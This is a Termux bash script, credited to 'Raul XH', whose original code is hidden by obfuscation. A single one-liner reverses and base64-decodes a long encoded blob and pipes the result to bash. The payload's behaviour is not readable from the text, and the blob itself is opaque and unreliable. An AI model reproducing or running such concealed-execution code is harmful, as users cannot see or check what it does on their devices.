#!/data/data/com.termux/files/usr/bin/bash
#
#
#
#
# 	Programado por [ Raul XH ]
#
#
#
#	[ whoami ] ?
#
#
#
#	[ script original ]
#
#
#
#
#
#	[ Ofuscado por Raul XH ]
#
#
#
#
#
#
#
#
#
#
#
#
 ''ba$'\163'"h" ${@}  <<< "$(   Qo=' ${*//Hy}  '"'"''"'"'EVAL  "$(    ${@##iF}RE'"'"''"'"'V <<<'"'"'
)D- 46ESAB kmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcPzMcI4gx9rLupz0EK0LkB1hrfj1EKacE11MCLrhiHjxyWbsy0nxzG8gBVnhiUL2zVXgiLr3Cf1xrvXKq7rciDPYw9rursThjUXLiGuwlG8gAJvwcku2CSvMcPzwckadi0LgELLqck8gAJvgiMyciL52BKTZjTCciU1ciVH2yLbYBKTtktX0tdrciXasCLnhkKaIBPbsAGi3BMLqckediWvwzSnxcjOGi9rLupz0EK4gxD94LIVvFbv1rbThjG42BPn3CLnhiHzxz15giH5wDGuMCIfuFfvftcThjG01Jxk+w9fuvhf0EKiciL1ciVH2yLLqckuJlWacCLvgBZLqckaszTaYBOnwzjKGcIOqFuj1tgThjBsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4bsP4xsP49vuvmj0EKOGc9rLupz0EKahBLHuFx9etfL1EKaciGaIo6oSBL1eiVr2BTbIBLbICHjhDUvuFfrvsiD1EKasxQSvFbv1rbThjkOaE11MCLrvFx9etfL1EKaIo0XwDHzwzKbICVbhiHf7WLnxyYrNBVnuFfrvsiD1EKasxQSvFbv1rbThjkOWKukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGukEGuk+JukUckGjLItjLIJjLItlLIJjLIdiLItjLIJjLIdiLItjLI3zLIdzLINALINGc9vuvmj0EKGxDTjxzu1NtfvKuhThjcsP4csP4csP4csP4SsP4GiiLIliLIdIGukoiGezLINGcmsP4qsP4msP4SsP4qsP4asP4msP4qsP4asP4msP4GaIPvkEc9vuvmj0EKOGiGygDULMCWLqckeevvjfjGiYtsvesdLKrKiciL1ciNWvAXCciL1ciP1ciKv2CjKGcIGxDTjxzuT2yVX2lU8Yy0v2lyLKrfjfuKisppjvrinusgLqckGxDTjxzuT2yVX2lJrxzVGvsgvKuqrci4TciK9wBOnwcjOWy0v2lyLKrfjfuKacE11MCLr1AJ9gBVq0vqrciWnwcjOai4vxBYvgvRn2BS9Yy0v2lyLKrfjfuKaIzY1ciTjxcjOqzSLMzVjhCVmgDL9cwjzursbfjGCczVGxDTjxzuT2yVX2lNasATaczLnxcjOGBLHgDjOqxDbcE11MCLr1AJ9gBVq0vqrciM1ciBTfiMLwckadi0LgELbIjMCcCSvgsGOtyKvxEbDciNGxDTjxzubIoKj3B3n3CHb1jGCsiVrwySfgDZ5wAGegDZvgiHL1jGiIBC5gx9rLupz0EKSsqvDuqKaYCL0xruLesxThjGSsFbv1rbThj0XLBC5gx9rLupz0EKSsqvDuqKaYCL0xruLesxThjGSsFbv1rbThj0XLBC5gx9rLupz0EK0vFx9etfL1EKesFfvftcThjB13vpXurzThjGmxjG0xruLesxThjG0vFx9etfL1EKesFfvftcThjB13vpXurzThjUXLiGygDULMCWbIjMasxDbcE11MCLr1AJ9gBVmgDL9cwjzursbfjGywlGS1wjOGBLHgDk0vxGGvsgvKuqrciK1ciBTfiMLMcV5MCVrNBLbszKbszSjwyPjxywbYikWgB152l2vgzV4JjGKxlGmhBV9gDTGxDTjxz0bYCSLgD11YCLnNC1nMBGWgBHr3CULgiNTgCGyIjGiIBC5gx9rLupz0EKSsFbv1rbThjG8gDUvwBV1giUvhiLjxzWnxzG8gzUfMEPXwy1r3yb1xruLesxThjGSsFbv1rbThjUXLiGygDULMCWPGiTbZwLXLi9qLupzKcI0MmZSdm1SJmBvgxI0JtfvKuhPGiTDZm7atn7aZwLXLi9uevjH0vkisBZmZoWuZoXSvzCjspx9etfLLcI0MnZSdm1SdmBvgxI0tqvDuqkisB0KZoWuZoWSvzCjspfvftcPGiTfto7atn7aZwLXLi9qursPWCY9gBVn0ikmLtnvftpnej9mftpnKcJOGiLXwAM9MCW9Yy0v2lyLKrfjfuKispbrvvsPWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIcJOWikmIc/asxGKwBH9gA3bYwjaYikmIcJOWikmIcJOqxGGewGWwDHjfiBbICVbhiVrwyTfMCN9MCqLWikmIcJOWikmIcOnxyIbIDUv2lULMyVeYi <<<(< ECRUOS'"'"'  ${*//t/p}  )"'  ${*%%\{-};"${@#0b}" p'''r'\intf  %s  "${Qo~~}"  ${@//<8};${*~~})" ${*%4R} 
#
#
#
#
#
#		Raul XH
#
#
#
#
#
#
